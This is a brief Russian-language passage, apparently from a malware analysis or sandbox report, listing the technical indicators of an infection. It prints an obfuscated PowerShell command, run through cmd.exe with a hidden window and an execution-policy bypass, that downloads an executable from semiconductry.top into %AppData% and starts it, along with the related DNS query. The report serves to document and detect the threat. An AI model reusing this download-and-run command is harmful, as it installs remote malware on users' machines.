Техническая информация
- http://semiconductry.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowErSHELl.EXe -exeCUTiONPoLicY bYPAsS -NoprofILE -wIndowSTyLE hidden (NEw-oBJECt sysTem.NEt.webclIent).DOwNloADfILE('http://semiconductry.top/search.php','%AppDATA%.EXE');START-pRoC...
- DNS ASK se####nductry.top
- '<SYSTEM32>\cmd.exe' /C "PowErSHELl.EXe -exeCUTiONPoLicY bYPAsS -NoprofILE -wIndowSTyLE hidden (NEw-oBJECt sysTem.NEt.webclIent).DOwNloADfILE('http://semiconductry.top/search.php','%AppDATA%.EXE');START-pRoC...' (со скрытым окном)